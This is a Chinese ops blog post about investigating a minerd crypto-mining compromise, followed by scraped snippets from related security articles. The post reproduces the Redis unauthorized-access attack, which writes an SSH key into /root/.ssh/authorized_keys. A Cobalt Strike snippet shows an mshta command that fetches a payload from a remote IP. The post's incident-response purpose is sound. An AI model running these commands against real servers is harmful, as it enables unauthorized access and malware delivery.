关键词:
杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢
我发现我的redis的 bind 0.0.0.0:6379
默认的。。。。应该是这边进来的。我自己做了下尝试。。。
127.0.0.1:6379> set aa "公钥"OK127.0.0.1:6379> config set dir /root/.ssh/OK127.0.0.1:6379> config set dbfilename "authorized_keys"OK127.0.0.1:6379> savessh-rsa AAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtFjN/BvO3vkg4awwYwp3K+UyAGob438pZnqNR37d1RrU7OzBolJ9NnTLPF03gI2aZpfW439T167bxHmKWYzN5vexTNv2orKWaQxMJtjN3xAwzpxiugaiguoleTTxBKG9TFjjBDblLYAoaVdylRLQLUwfCJ/WK50rK++hawBS15t6r9/zTuMD5TCsAJNEN88cPDOuEcnNwtLydtftH1BX3tPISSHtS4VwTr/LdAz40O9lKTTeU/JDHSIIRr95u2Y6/mhaLJwwLp/AFUB/NtF3HOIY75yG/F5k0q1fCaw== [email protected]夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。
奉劝大家不要黑别人的服务器,运维何苦为难运维。。。
通过这个网站可以查到开放的数据,就不给大家公开了,我得数据可能就是在这里被获取的。
黑客攻击事件到此完了
本文出自 “aolens·程超” 博客,请务必保留此出处http://aolens.blog.51cto.com/7021142/1865994
minerd挖矿木马
由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理。现状描述1top可以看到,这个minerd程序把cpu跑满了650)this.width=650;"src="https://hipho... 查看详情
一次minerd肉鸡木马的排查思路
...问题原因】这种状况在出现时通过top命令可以看到有一个minerd进程占用CP 查看详情
minerd.exe处理
:topTASKKILL/F/IM"minerd.exe"Gototopandthensearchingthefilesystemforminerd.exe.Next,searchWindowsRegistryforanyreferencetominerd.exeorthefilelocationofthatexecutable.ChancesaregoodthatifyouhadAVrunnin 查看详情
linux服务器后门检测rkhunter及被攻击后处理思路
前言rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对... 查看详情
木马针对ie发起攻击该怎么办?
木马针对IE漏洞发起攻击现在九成以上的木马,其都是针对IE漏洞来发起攻击的。如果某个漏洞被及时的补上,就好像把坏了的锁换了一把新的,网页木马就会失效。再如如果不用IE浏览器或者IE内核浏览器,那么大部分网页木马... 查看详情
安全预警暗云ⅲ木马攻击预警
...户数量巨大,是目前已知复杂度最高感染用户数量最大的木马之一。此病毒还兼容X86、X64两种版本的XP、Win7等操作系统,影响范围十分广泛。同时该木马主要通过外挂、游戏辅助、私服登录器等传播,此类软件通常诱导用户关闭... 查看详情
内网arp攻击
...时间又瞬间断线。ARP攻击内网诊断:1、断线时(ARP攻击木马程序运行时)在内网的PC上执行ARP–a命令,看见网关地址的mac地址信息不是路由器的真实mac地址;2、内网如果安装sniffer软件的话,可以看到ARP攻击木马程序运行时发出... 查看详情
cobaltstrikede攻击实战
参考技术A一、HTMLAppliaction建立监听生成木马后让被攻击机这点击木马一、上传到目标机,点击木马二、利用钓鱼生成链接执行命令:mshtahttp://192.168.204.135/download/file.extmshtahttp://121.40.189.212:80/download/file.ext主机上线二、MSOfficeMacro... 查看详情
redis后门导致被挖矿minerd解决办法
参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd入侵的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/在服务器中执行top查询,发现有minerd进程占用CPU达到90%多 查看详情
服务器遭到newinit.sh木马挖矿攻击记录(代码片段)
服务器遭到newinit.sh木马攻击记录一、中毒现象(Redis后门漏洞导致服务器被注入挖矿脚本解决)服务器负载异常,具体表现load值冲高服务器部分命令不可用,如top、ps、pstree、chattr等重点是影响正在运行的业务因为命令被篡... 查看详情
服务器遭到newinit.sh木马挖矿攻击记录(代码片段)
服务器遭到newinit.sh木马攻击记录一、中毒现象(Redis后门漏洞导致服务器被注入挖矿脚本解决)服务器负载异常,具体表现load值冲高服务器部分命令不可用,如top、ps、pstree、chattr等重点是影响正在运行的业务因为命令被篡... 查看详情
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接(代码片段)
...装大白鲨远程控制软件两个虚拟机开启ftp服务(用于木马文件之间的传输)大白鲨远程控制软件是一个比较旧的攻击软件大白鲨远程控制2010Bate1(v1.6)运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win200 查看详情
漏洞复现:使用kali制作木马程序
漏洞复现:使用Kali制作木马程序 攻击机:Kali2019靶机:Win764位 攻击步骤:1.打开Kali2019和Win764位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下命令:msfvenom-pw... 查看详情
隐藏在浏览器背后的“黑手”(代码片段)
导读本文从黑产攻击方式、木马恶意行为、监控及防御方案等角度对Lnkr木马进行分析,此类木马影响范围较广,攻击手法多样,但国内目前相关的资料却非常稀少,希望本文的实践经验和总结能对从事相关安全检测的同学有所... 查看详情
企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了
问题:一个lamp的服务器站点目录下所有文件均被植入如下内容<scriptlanguage=javascriptsrc=http://luoahong.blog.51cto.com/504977/1827164>包括图片文件也被植入了,网站打开时就会调用这个地址,造成的影响很恶劣。实际解决办法:思路是... 查看详情
内网渗透神器cobaltstrike之钓鱼攻击(代码片段)
一、HTA木马简介HTA是HTMLApplication的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。就是一个html应用程序,双击就... 查看详情
网络安全-webshell详解(原理攻击检测与防御)(代码片段)
目录简介原理常见一句话木马phpaspaspxjsp攻击WebShell管理工具webshell隐藏检测与防御静态检测参考webshellwebshell查杀参考简介Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马,一般分为大马、小马、一... 查看详情
服务器遭到newinit.sh木马挖矿攻击记录(代码片段)
服务器遭到newinit.sh木马攻击记录一、中毒现象(Redis后门漏洞导致服务器被注入挖矿脚本解决)服务器负载异常,具体表现load值冲高服务器部分命令不可用,如top、ps、pstree、chattr等重点是影响正在运行的业务因为命令被篡... 查看详情